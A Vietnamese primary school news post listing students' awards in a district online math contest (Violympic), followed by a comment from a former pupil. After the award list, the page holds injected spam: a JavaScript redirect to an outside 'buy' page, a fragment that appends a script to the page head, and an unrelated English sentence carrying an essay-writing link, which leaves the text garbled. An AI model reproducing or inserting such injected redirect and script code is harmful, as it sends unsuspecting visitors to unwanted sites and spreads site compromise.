Thi Giải Toán Violympic

02/04/2012 8:35 Sáng 1 phản hồi

Trong những năm gần đây, giải toán qua mạng luôn là hoạt động được giáo viên, phụ huynh và học sinh trường tiểu học Quan Hoa đặc biệt quan tâm. Phát huy những thành tích  từ năm học trước, năm học này, nhà trường đã phát động học sinh tham gia giải toán ngay từ đầu năm. Đây là một hình thức học tập hữu hiệu, bổ ích, vừa giúp các em được ôn tập, củng cố kiến thức, vừa thúc đẩy kĩ năng làm toán nhanh cho học sinh.

Qua theodõi và thống kê, một tín hiệu đáng mừng cho thấy, rất nhiều học sinh đã đăng nhậpvà tham gia giải toán trên mạng. Đây cũng là cơ sở để nhà trường lựa chọn và cử các em học sinh tiêu biểu tham gia thi giải toán cấp Quận. Ngày 20/3, 10 học sinh tiêu biểu  của trường đã tham gia thi cấp Quận.  Kết quả:

- Giải nhất:   1. Nguyễn Trung Kiên   (2A)

- Giải nhì:    1. Lê Đàm Duyên ( 2A)

2. Lưu Lan Nhi    ( 4B)

3. Phạm Từng Linh ( 5B)

4. Nguyễn Thuỳ Trang ( 5B)

- Giải ba:      1. Phạm Tùng Anh ( 1B)

2. Đỗ Tuấn Minh ( 3C)

- Giải khuyến khích

1. Nguyễn Ngọc Lan Hương ( 1A)

2. Hoàng Dương Minh Anh ( 3C)

location.replace(“http://gethere.info/buy.php”);

d.getElementsByTagName(‘head’)[0].appendChild(s); Last year’s pen/education week poll showed that almost 30 percent of americans responding believed that improving teacher quality was the surest way to improve https://writemyessay4me.org student learning

Chưa có phản hồi

  • các cô đi sing ạ,hy vọng các cô có những phút giây đẹp.Khai giảng con sẽ về thăm trường mình và các cô,đặc biệt là cô Chi (hy vọng cô Chi còn ở đó)